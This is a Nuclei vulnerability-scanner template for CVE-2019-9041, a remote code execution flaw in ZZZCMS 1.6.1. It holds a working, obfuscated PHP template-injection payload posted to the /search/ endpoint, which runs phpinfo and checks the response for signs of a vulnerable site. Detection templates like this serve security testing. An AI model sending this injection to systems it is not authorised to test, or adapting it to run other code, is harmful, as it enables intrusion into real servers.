nuclei-templates/cves/2019/CVE-2019-9041.yaml

32 lines
886 B
YAML

id: CVE-2019-9041
info:
name: ZZZCMS 1.6.1 RCE
author: pikpikcu
severity: high
description: An issue was discovered in ZZZCMS zzzphp V1.6.1. In the inc/zzz_template.php file, the parserIfLabel() function's filtering is not strict, resulting in PHP code execution, as demonstrated by the if:assert substring.
reference: |
- http://www.iwantacve.cn/index.php/archives/118/
- https://www.exploit-db.com/exploits/46454/
tags: cve,cve2019,zzzcms,rce
requests:
- method: POST
path:
- "{{BaseURL}}/search/"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
matchers-condition: and
matchers:
- type: word
words:
- "phpinfo"
- "PHP Version"
part: body
- type: status
status:
- 200